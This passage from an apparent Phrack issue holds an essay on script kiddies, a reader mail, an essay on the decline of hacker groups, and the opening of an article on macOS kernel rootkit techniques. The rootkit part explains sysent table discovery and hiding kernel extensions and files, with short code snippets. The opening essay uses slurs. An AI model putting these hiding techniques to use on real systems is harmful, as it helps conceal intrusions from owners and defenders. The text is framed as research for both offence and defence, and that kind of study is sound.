defusor for your carefag:
https://www.youtube.com/watch?v=JzNku_x2SLA -- steve brule

[F9] Thank you. :) Where was I? So much to say...
https://www.youtube.com/watch?v=AHBYgbA0sU8

In The Hacker Manifest, there is a carnal desire to be heard. To be under-
stood. (Read /The Stand/ by Stephen King.
https://www.youtube.com/watch?v=NkKOeeYko7w) To explain that by which no
adult actually wishes to hear. (Havey ou noticed the off-by-one yet?) To
declare war in a child-like way. And yet it just cannot be heard.

Can it not be heard? Or does it not want to be heard? Ah... the rub.

Adults deny they're failing children. This is the message of The Hacker
Manifesto. Not directly-- of course not directly. It's so clear that The
Mentor++ in all his absolutely vivacious youthful brilliance-- push and
pop is not only mad at the adults for having failed them (wtf mom), but is
equally knowledgeable that his data these lines are leaking too long
supersedes the concept of authority. Indeed, it renders authority to be an
irrelevant object, perpetuated by fearful drones finding the floorboards of
their hilariously poorly constructed ships of code having their nails being
ripped out from under them in the form of exploits, engineering and overall
eclectic compromise. (Typos are fun.) INJECT INJECT

So what that The Mentor did not select the "proper" worsd? (Also known as
diction. Boundaries are useful and great to break.) So what that he made
typos? So what that his angst was so clear and apparent in his writing? So
what that he was an assertive carefag with his writing? SO FUCKING WHAT?
https://www.youtube.com/watch?v=0XoyDqFy5pU

He was correct. Deal with it. http://tinyurl.com/marshmelol

Those who cannot see that The Mentor was correct should perhaps attempt to
learn who they're up against (of course, they never will, because...):

          v  v  v  v  v  v

        This is our world now... the world of the electron and the switch,
the beauty of the baud.  We make use of a service already existing without
paying for what could be dirt-cheap if it wasn't run by profiteering
gluttons, and you call us criminals.  We explore... and you call us
criminals.  We seek after knowledge... and you call us criminals.  We
exist without skin color, without nationality, without religious bias...
and you call us criminals. You build atomic bombs, you wage wars, you
murder, cheat, and lie to us and try to make us believe it's for our own
good, yet we're the criminals.

        Yes, I am a criminal.  My crime is that of curiosity.  My crime is
that of judging people by what they say and think, not what they look like.
My crime is that of outsmarting you, something that you will never forgive
me for.

        I am a hacker, and this is my manifesto.  You may stop this
individual, but you can't stop us all... after all, we're all alike.

                                         ^  ^   ^

Thank you children. Off by one. But which way? ;-)

(Hola, Espana! https://www.youtube.com/watch?v=U-Oxx_YbYnM)

Welcome. You've got mail! Goshk, I had no idea that my password needed to
be changed! Thanks Steve Case,my password is fishing!

Mom got infected with a false punter once. It told her "your computer has
been FUCKED!!!" Over and over again. In a DOS terminal.

I couldn't stop it. I didn't know what it meant. I was young. I thought I
was just having fun, you know? It was hilarious to press "punt" and watch
people disappear. (Third person. First person. Literary techniques.)

Ah... Mom is letting her ego leak. F9 for me, darlings.

moar liek F8 amirite (Indeed. <3)

The enemy of our community is very much the script kiddie. Ah, but, as
hackers, you must understand what a script kiddie truly is. You are on the
right track: a script kiddie has an ego issue. But your mother would like
to explain verbosely her understanding of the script kiddie, for the script
kiddie is a metaphor for the floor 4 the enemy of your mind.

https://www.youtube.com/watch?v=UDf2r9DnVGU

Do you know what a script kiddie is? It's not someone who's just not
talented. It's not someone who simply uses the tools of this community--
no, it's much more than that. A script kiddie is someone who abuses the
knowledge they can't truly grasp for the sake of power. A script kiddie is
someone who takes what's been given to them-- the love and beauty of every
single passionate line of code per each exploit, dropper and packer-- and
simply gloats. Yeah, you're a hacker alright-- you hack emotions. And it's
not to say that you're not talented for hacking emotions-- it's an
important talent in a lot of regards. No, what gives script-kiddie the
disgusting charge it deserves is the way a script kiddie works: braggart;
liar. Thief.

Of course these are simply different kinds of artists, sure. Liars are
talented. Thieves have the slipperiest fingers around. (There is in fact
honor among thieves. Don't buy that prior rhetoric.) And in their own re-
gards, script kiddies have a special kind of talent.

They can convince you that they are a hacker because they look like one.

There's a world of difference between a script kiddie and a hacker. And it
binarily has nothing to do with the fact they didn't roll their own code.

A script-kiddie is not a hacker. Why? How? They use the tricks, do they
not?

They do. And they shouldn't. You should stop them. For their primary goal
is to feed and inflate their ego. Not hack.

We've taken it to understand for quite some time that a script kiddie is
not to be respected-- and this is correct. One who seeks to increase their
sense of fame over their passion-- or, rather, that their passion -is- in
fact their ego-- can be considered a hacker in some way or another. But we
should deny them this. We should simply lie. Kill the narcissist.

Is a child not a hacker because they only use Metasploit? Nay, say moms,
for the child is a hacker because they know how to USE Metasploit. One
cannot simply compromise Mordor even by executing AutoPwn-- mom's tried.
Mom failed. Mom is not a break-in artist like a lot of her children. Mom
can write exploits++ she simply sucks at executing them. (Or perhaps you
don't know the exploits your mother is capable of. Trixy thingsies. ;) pop

Is a child a script-kiddie because they use Metasploit? Nay, say moms, for
the same reasons listed above-- only a hacker would know what exploits to
run where after perusing a system's entryways. A script-kiddie gets upset
at the lack of capable elegance of mashing buttons like a fucking retard.

(Hackers understand the dualism of words like retard and faggot. Skids
don't.)

So are script kiddies hackers? Technically, yes. Logistically, fuck 'em.

[Alt+0153]

Why fuck them? Their ego gets in the way. It gets in their way. It gets in
your way. It gets in the community's way.

The hacker community is one of this world's best communities for the sake
of its strong desire for ego death. You know, killing attention whores?
Quite a worthy past-time of the hacker community. It deserves to be done
more, really.

Ego death is the core of the hacker. Ego life is the core of the script-
kiddie. Ah... binary. <3)))O and Neurosis

Let's use furries as a metaphor. Are all furries egomaniacs? Selfish
narciscists as a pox on the Internet? Of course not. Many furries are
talented. In fact, you may just discover that furries are thef auna of the
Internet. (They rock the root servers. No joke. You know what I mean
eyman.) Yet due to the nature of the furry community, there is an inherent
plague of narcissism, of taking credit for the artists they so deistically
worship. QUHTGLVHSQWIUHETHUEBHAOPQVNCPWET3220qalfafLHUEILW Erasure.)
Indeed, these furries act as a metaphor for 4 four floor ceil float [F9]
Good. These furries act as a metaphor for script kiddies. The skids.

(White Mantis is a very good furry artist...)

Skids narcissistically take advantage of your artwork and pretend to praise
you for it. Of course, they never praise you-- they're badass ahckers be-
cause they take advantage of you. And you poured your heart out into that
exploit too, didn't you? You stumbled into that bug and you travelled to
the darkest depths of the kernel for months-- even years!-- to understand
not only how to discover its presence, but equally, to harness it, to
throw a saddle on that dragon and ride it to root.

And they -bragged- about it? They smugly proclaimed their power because of
-your- research? Then they turned around and asked you, hey, where's the
next one? Man, that hit you gave me last time, gosh, that was so powerful,
so verys trong, may I have another and steal the fame you don't even want
you fucking nerd?

Skids aren't inherenty white-hats, no. But lots and lots of white-hats?
Yeah. Fucking skids.

White-hats have a desire to defend. But too many of them are drowning in
the mammal sauce (https://www.youtube.com/watch?v=_MbhPWud8kM) of their
exceedingly egotistical bullshit. Another metaphor could be said here, but
darlings, live for the swarm. StarCraft leak.

White-hats are not your enemy. This community needs defenders. Defenders
are the dualism to attackers. A good defender can stop a good attacker and
bring everything to a standstill. You know the scene:
https://www.youtube.com/watch?v=5oPsvq81n2A

Defenders assist your existance. Attackers assist your existance. For in
this community, we are one and or other but not xor: a ternary system.
Attack defend and blend.

Your enemy are the skids. Kill the skids by overdosing them. Taunt them.
But you must first give them the opportunity to kill their ego. For the
best hackers k https://www.youtube.com/watch?v=S0JfwiHjVIg [F9] [F9] [F9] 

u mad bro[F9] [F9] [F9] [F9] [F9] [F9] [F9] [F9] [F9] [F9] 

Hehe. Good. :)

For the best hackers have killed their egos. All that's left is the id...
and the superego.

More powerful than a white-hat!

Faster than a screaming zero-day!

Mom didn't watch much SuperMan... but you get the point. :)

The hacker community is so very diverse and wonderful. And it's all because
the true tinkerers of this community ahve found a variety of ways to
slaughter egos. Those egos that can't be killed with kindness and through
coersion? Well... you've read ZF0.

I'd like to remix something for you:

http://teacher.scholastic.com/activities/immigration
timeline_photos/1892_small_fullsize.jpg

>>> Give us your packers, your crackers, your exploit authors and strange
>>> artists, your Jolt-chugging CTF players competing just to play. The
>>> Mr. The Plagues spreading the plagues of their obfuscated payloads.
>>> Kill these, your egos, the tempest-noise of your science, we bite our
>>> thumb at thee who does not see my children are brilliant. And deserve
>>> steak.

Kill the skids. And ask your local kids: who the fuck are dids? For they
are tit-for-tat and one in the same rhythym..

----

Shouts: Fuck shouts. This is for all of you. :)

Haters: I love you. Refute me with your wicked science.

Closing notes:

WATCH

MISTER

ROBOT

VERY

CLOSELY

Take note of the inconsistencies. They're fun. Like... well. :)

First: https://www.youtube.com/watch?v=Wru2aDvmpT0

In conclusion: https://www.youtube.com/watch?v=zAB5AC9yhY0

And: https://www.youtube.com/watch?v=D9RfSYOfKD0

Ellipses.

====MOM FROM MESSAGE BEGIN====


[>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>]
|--=[ 0x03 - The P0 mailz ]=---------------------------------------------=|
[<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<]

        [ We received a lot of mails related to P0. Not sure why, we have
          nothing to do with them. We publish one of them here. ]

From: patagonico
Subject: P0

I think this can be separated in two parts: Tech and non-tech
Technical: Finding bugs in a huge codebase that is 20 year old is moot.
It's like giving the proverbial fish. The codebase will always stay
hungry, and buggy. You needed to teach the developers to fish bugs, 20
years ago. Software protections and automatic tools help, but you cannot
protect for logical flaws or injections. Also, for each bug you find,
devs introduce 1000. Bug hunters will be always outnumbered.

Non-tech: Moral high horse of good hackers is a physiological
testosterone-induced illusion whose main objective is to establish a
dominance hierarchy and help you have sex and pass your genes. It does
not work. There are no girls in infosec. The girls in infosec are men.
It is good or bad to report bugs? time will tell. Too a complex system
to make any predictions now. It might be better to live in a world where
weapons are outdated and countries attack each other with 0days. You see
what a bomb does to a kindergarten? 0days do not do that. 0days are
elegant weapons, for a more civilized age.


|--=[ EOF ]=-------------------------------------------------------------=|


--------------------------------------------------------------------------------


                              ==Phrack Inc.==

                Volume 0x0f, Issue 0x45, Phile #0x06 of 0x10

|=-----------------------------------------------------------------------=|
|=--------------------=[ The Fall of Hacker Groups ]=--------------------=|
|=-----------------------------------------------------------------------=|
|=---------------------------=[ by: Strauss ]=---------------------------=|
|=-----------------------=[ strauss@phrack.org ]=------------------------=|
|=-----------------------------------------------------------------------=|

--[ Table of Contents

0 - Intro
1 - Background
2 - Nowadays
3 - Conclusion
4 - Shouts
5 - References
6 - Notes


--[ 0 - Intro

The earlier, bigger part of hacking history often had congregations as
protagonists. From CCC in the early 80s to TESO in the 2000s, through LoD,
MoD, cDc, L0pht, and the many other sung and unsung teams of hacker heroes,
our culture was created, shaped, and immortalized by their articles, tools,
and actions.

This article discusses why recently we do not see many hacker groups
anymore, and why the ones we do, such as Anonymous and its satellite
efforts, do not succeed in having the same cultural impact as their
forefathers.


--[ 1 - Background

Hacking is, in its very essence, an underground movement. Those who take
part on it have always been the ones who (ab)used technology in ways beyond
the knowledge of the larger userbase. It is tightly linked to intense
efforts in unveiling previously unknown information as well as in sharing
these discoveries. These premises hold true for as long as we know hackers:
since computers had barely no users up until the informatic massification
of today.

The nature of the hacker interests intrinsically poses difficulties:
growing knowledge on anything is hard. It requires heavy research,
experimentation, and can turn into an endless journey if objectives are not
carefully set. Just like in any field of scientific studies, it calls for a
good amount of colaboration, an attitude which, luckily for hackers, was
greatly enabled by the advent of computer networks and, most notably, the
Internet.

Computer networks increasingly made it possible to transmit unlimited and
uncensored information across their geographical extent with little effort,
with little costs, and in virtually no time. From the communication
development standpoint, one would expect that the events that followed the
80s to our days would lead to a geometric progression in the number of
hacker communities. In effect, hacking has arguably grown. Hacker
communities, definitely not. So what went wrong?


--[ 2 - Nowadays

We live in days of limited creativity. Moreover, as contraditory as it may
seem, it looks particularly rare for creativity to arise from groups or
teams. Communities, rather than individuals, should be more intellectually
empowered to create, but lately we have been watching the force of the
solo, the age of the ego. That, of course, when we do see anything that
catches our attention for originality, which is an ever scarcer pleasure.

In "Time Wars" [1], Mark Fisher explains that post-fordism has taken us to
this catatonic inability to innovate. Our nearly obsessive compulsion for
work consumes not only our time, in the literal form of labor hours, but
our minds, by distracting us from everything else we could be doing
otherwise. These distractions include our unceasing connection to ubiquous
media (e.g. the frequent checks for new e-mail, or accesses to social
networks on mobile devices) as well as an increased concern with financial
stability and provisioning, a concern that grows as welfare is invariably
trimmed by both the governments and the private sector.

It is important to note that our capitalist worries are more deeply rooted
in us than might seem at first, even in the most politically diverse
people. Supporting oneself is not easy, it does not come for free. Getting
some education, finding a job, staying up-to-date... regardless of what
your aspirations are, whatever you feel obliged to do is probably a lot,
already. And it likely involves a prevalence of "minding your own
business".

The unsettlement created in our thoughts affects intellectual solidarity in
even more severe ways than it does individual creation. Simply put, if it
is already so difficult for one person to focus away from these
"distractions" and into inspired productivity, let alone for a group to
join in a true collective mind. The ties that bind collective-minded
parties together take dedication to build, and our egotistical concerns do
not help (see note "A"). Not only is commitment required for the actual
work to be accomplished, but also to identify the shared values and goals
that enable true human connectivity.

Notice this does not concern _collaboration_ as much as it does
_collectiveness_. Collaboration typically breaks down the creative process
in a way it can be incrementally achieved with very self-sufficient,
individualistic contributions. Such is the case in most open-source
software projects. Roles are very well segregated so that a minimum of
human integration is required, as far as most modern software development
processes go, anyway. A true "hive mind" [2] cannot exist without the
support from a stronger, more unisonant cognitive bond. Funny enough, the
popular variants of LOIC, the DDoS tool used by "Anonymous", contain a
"hive mind" feature (i.e. getting a target automatically from a given IRC
server and channel and firing your packets against it). You wish it was
that easy.

The concept of the "conscience collective" was first established by Emile
Durkheim who, in his 1893 book "The Division of Labor in Society",
expressed 'that the more primitive societies are, the more resemblances
(particularly as reflected in primitive religion) there are among the
individuals who compose them; inversely, the more civilized a people, the
more easily distinguishable its individual members', as put by R. Alun
Jones [3].

Well, following (or despite) the prosperous adoption of atheism and
agnosticism as professed in the Internet and other popular media, it is
understood that religious beliefs are in a low, taking a bit of what
socities traditionally saw as a point of unity. In fact, there seems to be
an ever growing search for uniqueness in the modern man, especially that
from the apparently overpopulated metropolises (see note "B"). In this
never-ending crowd of interesting, outstanding personas, we want to shine
somehow, to prove ourselves different and original. In the end, it turns
into a pointless battle, against God-knows-who, for apparent singularity.
Instead of reaching for the fellow man, we want to set ourselves apart, and
thus, remarkable.


--[ 3 - Conclusion

Modern life nearly conspires against the collective. We are tormented by a
relentless flow of information as well as the daily worries of an eternally
insecure, unwarranted life. Furthermore, we dread the thought of being
alike, of sharing multiple views and opinions. As such, we are turning
progressively judgemental of who we should be partnering with, on the basis
that "they do not understand". In hacking, it yet implicates on the
delicate subject of trust, which would require an essay on itself, given
the undeniable importance the matter has acquired over the years.

If our thoughts on creating hacker groups were to be summarized, this is
how they would look: No one ever feels like we do. They are not to be
trusted and we do not have the time for them. The only attitude consonant
to our search for a comfortable, safe life is to constrain ourselves to our
own limitations, ignore the intelligent life out there, and surrender to
the mediocracy that our society has condemned our leisure time to.


--[ 4 - Shouts

My only acknowledgements go to whoever reads this through and puts his/her
thoughts to it. I eagerly await for your comments.


--[ 5 - References

[1] "Time Wars", Mark Fisher - http://www.gonzocircus.com/xtrpgs/
      incubate-special-exclusive-essay-time-wars-by-mark-fisher/
[2] "Collective Consciousness", Wikipedia -
      http://en.wikipedia.org/wiki/Collective_consciousness
[3] Excerpt of "Emile Durkheim: An Introduction to Four Major Works",
      Robert Alun Jones - http://durkheim.uchicago.edu/Summaries/dl.html


--[ 6 - Notes

A) In respect to social networks, while they are a valid community-building
mechanism in nature, selfishness prevails in common usage, by means of the
indulgent pleasure that fuels chronic "pluggedness", at times voyeur, at
times exhibitionist and needy.

B) It is arguably the case, though, that the globalizing aspect of the
Internet has brought the feeling of upsetting commonality to the citizens
of even the more unpopulated places.


--------------------------------------------------------------------------------


                              ==Phrack Inc.==

                Volume 0x0f, Issue 0x45, Phile #0x07 of 0x10

|=-----------------------------------------------------------------------=|
|=-------------=[ Revisiting Mac OS X Kernel Rootkits ]=-----------------=|
|=-----------------------------------------------------------------------=|
|=---------------------=[ fG! <phrack@put.as> ]=-------------------------=|
|=-----------------------------------------------------------------------=|

--[ Table of contents

  1 - Introduction
  2 - The classic problems
      2.1 - What is new since Tiger
      2.2 - Sysent table discovery techniques
      2.3 - Hiding the kext
      2.4 - Hiding files
      2.5 - Hiding processes
      2.6 - Modifying the syscall handler
  3 - Reading the filesystem from kernel land
      3.1 - Real short overview of VFS
      3.2 - The easy way - Apple loves rootkit authors!
      3.3 - The more complex way
      3.4 - Solving kernel symbols
  4 - Executing userland binaries from the kernel
      4.1 - Writing from kernel memory into userland processes
      4.2 - Abusing (again!) dyld to inject and run code
      4.3 - Finding the place to execute the injection
      4.4 - Ideas are great, execution is everything
      4.5 - The dynamic library
      4.6 - Hiding our tracks
  5 - Revisiting userland<->kernel communication
      5.1 - Character devices and ioctl
      5.2 - Kernel control KPI
      5.3 - Ideas for our own alternative channels
  6 - Anti-forensics
      6.1 - Cheap tricks to reduce our footprint
      6.2 - Attacking DTrace and other instrumentation features
          6.2.1 - FSEvents
          6.2.2 - kdebug
          6.2.3 - TrustedBSD
          6.2.4 - Auditing - Basic Security Module
          6.2.5 - DTrace
              6.2.5.1 - syscall provider
              6.2.5.2 - fbt provider
      6.3 - AV-Monster II
      6.4 - Bypassing Little Snitch
      6.5 - Zombie rootkits
  7 - Caveats & Detection
  8 - Final words
  9 - References
  10 - T3h l337 c0d3z


--[ 1 - Introduction

In Phrack #66, ghalen and wowie wrote about interesting OS X kernel
rootkit techniques. That article is almost 4 years old and 4 major OS X
releases behind. Today Mountain Lion is king and many of the presented
techniques are not valid anymore - Apple reacted and closed those "holes".

One hand is enough to count the number of known rootkits targetting
Apple's OS. The most recent public release was Rubylin [2], a simple
rootkit that works with Lion (v10.7) (if you can read Korean there is
a very interesting memory forensics analysis at [3]).

The commercial spyware industry recently leaked DaVinci (aka OS.X/Crisis),
a user/kernel rootkit with some interesting features and flaws [4]. There
are rumours about FinFisher but no OS X leak happened yet. Everything
else is too old and outdated.

The main goal of this article is to update public knowledge and
introduce some "new" techniques so both offensive and defensive sides
can improve. It is focused on the current version at the time of this
writing, Mountain Lion, v10.8.2.

The defensive knowledge and available tools are still poor. I hope
this article motivates others to invest time and resources to improve
this scenario. It is quite certain that the offensive knowledge is
significantly ahead.

I tried to make this article as complete as possible but there is so
much to work to be done that it is a never-ending story. Some of the
proposed solutions can be improved or implemented in different and/or
better ways. You are encouraged to improve or develop new approaches
and of course publish them. I also like to learn from others ;-)

I hope you enjoy this (long) journey.
fG!


--[ 2 - The classic problems

This section starts by introducing important changes made since Tiger.
Then it discusses the old sysent retrieval techniques and their problems,
and presents a solution compatible with past, current, and future OS
X versions.

It continues with improvements to classic rootkit features - hide and
avoid (easy) detection. It must be noticed that these were developed
before the in-kernel symbol resolution technique to be presented later,
so they might appear a bit unsophisticated. I think there is value in this
knowledge and that is why it is described under the original conditions.


----[ 2.1 - What is new since Tiger

The easiest and many favourite's spot to hook the system calls is the
sysent table - just replace a pointer and we are set. Apple has been
improving the defence of that "castle" by hiding the sysent table symbol
and moving its location.

In Mountain Lion the table is now located in read-only memory (not a
big problem anyway). Syscall hijacking techniques like these can be
easily found with basic analysis tools, but they are still interesting
and useful for other purposes as to be shown later.

Another important change is that the kernel module list (kmod_info_t) is
deprecated. Before, the kernel extension rootkit could be easily hidden
from kextstat by manipulating this list. Now we must patch an I/O Kit
OSArray class called sLoadedKexts to hide from tools that list loaded
kernel extensions. Snare was the first to publicly discuss this issue,
and the commercial spyware OS.X/Crisis the first (afaik) to implement
it. Its technique will be later described.

Mountain Lion finally introduced kernel ASLR. It might be harder to
develop and execute the necessary exploit to install the rootkit but
after that it is (mostly) business as usual.

Up to Snow Leopard, Apple removed the symbol table from the kernel space
so there was no easy way to solve non-exported symbols inside the kernel
extension or I/O Kit driver. This was changed in Lion by leaving the full
__LINKEDIT segment in kernel memory but marked as pageable. Snare shows
this in one of his posts [5] and rubilyn rootkit uses it. Beware that
the formula they use has a small problem - it assumes that the symbol
table is located at the beginning of __LINKEDIT. This is true in Lion
but not in Mountain Lion.

I will show you how a solution that is stable, simple, and compatible
with all OS X versions. Too good to be true! :-)


----[ 2.2 - Sysent table discovery techniques

As described in Phrack 66 article, Landon Fuller [6] was first to come
public with a technique to solve the removal of exported sysent symbol.
His technique is based on the distance between the (still) exported
nsysent symbol (the number of entries in the sysent table, aka, number
of syscalls) and sysent. The problem with this approach is that Apple
can move the location of sysent between releases - offsets will change
and the rootkit will fail and expose itself. Not acceptable!

Lets illustrate this with an example, starting with Mountain Lion 10.8.2:

$ nm /mach_kernel | grep nsysent
ffffff8000839818 D _nsysent

The location of sysent can be found by disassembling the kernel and
using one of the three functions that reference it:

- unix_syscall
- unix_syscall64
- unix_syscall_return

For 10.8.2 the sysent pointer will be located at 0xFFFFFF80008000D0
and the table located at 0xFFFFFF8000855840. Landon's formula does not
apply here.

In Lion 10.7.5 we have:

$ nm mach_kernel_10_7_5 | grep nsysent
ffffff8000846ed8 D _nsysent
And sysent located at 0xFFFFFF8000842A40.

This confirms Apple moving around the pointer between different
releases. Notice that all previous values are from kernel at disk so no
kernel ASLR slide is included. The slide value will be disclosed whenever
it is being used in the examples.

Another technique is described in The Mac Hacker's Handbook [7], released
in 2009 and targeting Leopard.

On page 332 there is a code snippet that searches memory for "something
that has the same structure as the sysent table.". The starting search
point is the nsysent symbol, increasing the memory pointer to lookup
and match sysent array elements.

That code snippet does not work with Snow Leopard because sysent array
is located before nsysent symbol. It must be modified to support specific
versions and releases.

These different examples demonstrate that Apple changes sysent location
between releases. A stable rootkit requires an universal technique.

The second technique can be adapted to cover all cases. First we would
scan memory addresses above nsysent and then below if initial search
failed. If nsysent also stops being exported we would need to base the
search in another symbol and continue the cat & mouse game.

The reference symbol problem can be easily solved using a feature of
x86 systems, the interrupt descriptor table (IDT). The IDT "is used
by the processor to determine the correct response to interrupts and
exceptions." [8]. The traditional implementation of syscalls is done via
interrupt 80. The response to this interrupt will be executed by a kernel
function pointed to by the IDT. IDT's location can be obtained using the
asm instruction "sidt" (store interrupt descriptor table register). It
returns the table location so the next step is to find out the address
of the interrupt 80 handler.

Once we have the interrupt 80 handler address we can find out the
base address of the kernel. Kernel ASLR does not matter here because
the handler address is always a valid kernel code location - we are
dynamically querying the system and not using fixed addresses. To find
the kernel base address is just a matter of searching memory back for
the magic value of the Mach-O header - 0xfeedfacf (64 bits) or 0xfeedface
(32 bits).

One (curious) property of kernel ASLR implementation is that memory
addresses in kernel and kexts Mach-O headers already contain the ASLR
slide, something that does not happen in userland ASLR'ed binaries. The
header in userland binaries is never updated so it is not synced with
the address where the binary is loaded at.

The next step is to process the Mach-O headers and find out where the
__DATA segment is located. The reason for this is that the sysent table
is located in there - we need to extract segment's start address and
boundaries. Now it is just a matter of searching memory for something
that matches the sysent table.

Are there any performance problems doing things like this? The sysent
location is found in less than a second even on a 5 year old Core 2 Duo
Macbook Pro. The performance impact can be considered meaningless.

This method was applied successfully when the first Mountain Lion
developer preview became available and still works up to 10.8.2.

You can find its implementation in the included source code at the end.
A userland version that uses /dev/kmem to extract the same information
is available at [9].

What is the difference against using any other exported symbol instead
of all the trouble with the interrupt handler? Honestly, it is just a
matter of personal preference and technical "prowess". A symbol that
breaks compatibility if removed could be used instead with very low risk
of Apple changing it. Later, we will need to use at least one KPI so
almost any symbol from it can be used as search's starting point.

Another solution is to use one MSR register involved in the SYSCALL
instruction. A good candidate is the MSR register number 0xC0000082
(MSR_IA32_LSTAR), which contains the SYSCALL entrypoint.

One way to get its value in 64 bits is the following (ripped from XNU):

#define rdmsr(msr,lo,hi) \
__asm__ volatile("rdmsr" : "=a" (lo), "=d" (hi) : "c" (msr))

static inline uint64_t rdmsr64(uint32_t msr)
{
    uint32_t lo=0, hi=0;
    rdmsr(msr, lo, hi);
    return (((uint64_t)hi) << 32) | ((uint64_t)lo);
}

Calling rdmsr64(0xC0000082) will return the kernel address that will
handle 64 bits syscalls via the SYSCALL interface. The register number
0x176 (MSR_IA32_SYSENTER_EIP) is the one we are interested at for 32
bits systems - it is used for 32 bits syscalls via SYSENTER.

These are just a few possibilities to retrieve a valid address inside
the running kernel and then find the start address of the kernel Mach-O
header and sysent location. The location of the Mach-O header will be
useful to compute the kernel ASLR value (the slide is stored in a kernel
variable but its symbol is not exported!).


----[ 2.3 - Hiding the kext

As mentioned before, the kernel module list is deprecated in favor of a
IOKit OSArray class called sLoadedKexts. This introduces a new problem:
how to find its location since we are talking about IOKIT C++. The
OS.X/Crisis spyware implemented an interesting solution. It leverages
a simple IOKit method that references sLoadedKexts to find the object
location.

The method is OSKext::lookupKextWithLoadTag [libkern/c++/OSKext.cpp]:

OSKext * OSKext::lookupKextWithLoadTag(uint32_t aTag)
{
    OSKext * foundKext = NULL;  // returned
    uint32_t count, i;

    IORecursiveLockLock(sKextLock);

    count = sLoadedKexts->getCount(); <- use this location, for example
    for (i = 0; i < count; i++) {
        OSKext * thisKext = OSDynamicCast(OSKext,
            sLoadedKexts->getObject(i));
        if (thisKext->getLoadTag() == aTag) {
            foundKext = thisKext;
            foundKext->retain();
            goto finish;
        }
    }
finish:
    IORecursiveLockUnlock(sKextLock);
    return foundKext;
}

There is no symbol resolution feature inside the Crisis kernel rootkit
- the symbol (__ZN6OSKext21lookupKextWithLoadTagEj) is solved by the
userland component and sent to the rootkit module via a sysctl. The
function that hides the rootkit starts by searching for the 0xE8 byte
corresponding to the IORecursiveLockLock() call. All searches are done
using hex patterns. It then uses fixed offsets to compute the location
of the array and modify it. The provided source code reimplements
this technique.

The search could be made easier (and portable?) by disassembling this
method. The good news is that we can have a x86/x64 disassembler inside
a kernel extension thanks to diStorm [19] (other libraries probably
work but I'm a fan of diStorm, in particular after the introduction of
the decompose interface). To statically compile diStorm just import the
source and include files into your rootkit project. You also need to
define SUPPORT_64BIT_OFFSET or uncomment it at config.h.

Assuming we have no method to find kernel symbols inside the rootkit
(this will be later developed), we can use the disassembling engine
to try to find the functions or methods that we are interested in. The
whole __text section can be disassembled and searched for instruction
patterns that are hopefully more stable than hex patterns.

Testing this approach I was able to find the method referenced above with
a precision of 100% or 50%. The different rates depend on how strict are
the search parameters due to some differences between compiler output in
kernel versions. I'm talking about the number of calls, jmps, jnz, jae,
which have small variations between some versions (compiler upgrades,
settings, etc). The performance is amazing - it takes 1 second to
disassemble and search the whole kernel using a high-end Intel i7 cpu.

The main problem of Crisis's approach is that it depends on fixed offsets
inside the OSArray class. If anything changes it will break compatibility
and potentially crash or expose the rootkit.

Disassembling the kernel is useful to find patterns and leveraging them
in different cases. It is not perfect and does not solve all our problems
but it is another helpful tool.


----[ 2.4 - Hiding files

Files are hidden by modifying (at least) three different syscalls:
getdirentries, getdirentriesattr, and getdirentries64. Nothing new and
thoroughly described before.

What usually happens is that only the filename is matched - that is the
information directly available from the structures available in those
three syscalls. This means that a filename to be hidden will be matched
in any folder, something that can raise suspicion if a common filename
is used. With a small effort we can do better and learn something in
the process.

Let's find out how to recover additional information to match specific
file or folder locations. Target function is getdirentries64 but the
concepts apply to the other two.

The structure that is commonly manipulated is:

struct direntry {
  __uint64_t  d_ino;      /* file number of entry */
  __uint64_t  d_seekoff;  /* seek offset (optional, used by servers) */
  __uint16_t  d_reclen;   /* length of this record */
  __uint16_t  d_namlen;   /* length of string in d_name */
  __uint8_t   d_type;     /* file type, see below */
  char d_name[__DARWIN_MAXPATHLEN]; /*entry name (up to MAXPATHLEN bytes)*/
}

The match is done against the field d_name, which only contains the
current file or folder without the full path. This is the reason why
most implementations only match the file anywhere in the filesystem.

Luckily for us, all syscalls functions prototypes contain the proc
structure as the first parameter. It contains enough information to
match the full pathname.

struct proc {
(...)
    struct  filedesc *p_fd;        /* Ptr to open files structure. */
(...)
}

struct filedesc {
    struct  fileproc **fd_ofiles;   /* file structures for open files */
    char    *fd_ofileflags;         /* per-process open file flags */
    struct  vnode *fd_cdir;         /* current directory */
    struct  vnode *fd_rdir;         /* root directory */
    int     fd_nfiles;              /* number of open files allocated */
    int     fd_lastfile;            /* high-water mark of fd_ofiles */
    (...)
};

For example, to display all the open files by an arbitrary process
calling getdirentries64, we could use the following code:

void show_all_openfiles(struct proc *p)
{
    // lock proc structure else we are asking for trouble
    (*proc_fdlock)(p);
    struct filedesc *fd = p->p_fd;
    if (fd != NULL)
    {
        // for some reason fd_nfiles is not useful for this
        int lastfile = fd->fd_lastfile;
        // show all open files for this proc
        for (int count = 0; count < lastfile; count++)
        {
            // fd_ofiles is an array of fileproc that contains file structs
            // for all open files
            struct fileproc *fp = fd->fd_ofiles[count];
            // we are only interested in files so match fg_type field
            if (fp != NULL &&
                fp->f_fglob != NULL &&
                fp->f_fglob->fg_type == DTYPE_VNODE)
            {
                // lock the vnode - fg_data cast depends on fg_type
                // type is vnode so we know fg_data will point to a vnode_t
                (*vnode_lock)((struct vnode*)fp->f_fglob->fg_data);
                struct vnode *vn = (struct vnode*)fp->f_fglob->fg_data;
                if (vn->v_name != NULL)
                {
                    printf("[%d] Filename: %s\n", count, vn->v_name);
                }
                (*vnode_unlock)((struct vnode*)fp->f_fglob->fg_data);
            }
        }
    }
    (*proc_fdunlock)(p);
}

The files listed by this function are not the files we want to hide but
the files opened by the binary calling this syscall. This information
can be used, for example, to find the path that a "ls" command is trying
to list. The full path can be extracted manually by iterating over the
vnodes of each file, or by using a KPI function (vn_getpath).

To build the path from vnodes, first we retrieve the vnode structure
correspondent to the file and then iterate over up to the filesystem
root - each vnode has a reference to its parent vnode.

struct vnode {
(...)
    const char *v_name;      /* name component of the vnode */
    vnode_t v_parent;        /* pointer to parent vnode */
(...)
}

Each path component can be sequentially matched until v_parent == NULLVP,
which means the filesystem root. If path matches what we want to hide
then it is a matter of removing that entry from direntry array as usual.

To find the folder or file being listed we can use the following trick,
which seems to hold true:

int lastfile = main_fd->fd_lastfile;
// lastfile has the information we are looking for
struct fileproc *last_fp = main_fd->fd_ofiles[lastfile];

The only word of caution is when shell expansion is involved. In this case
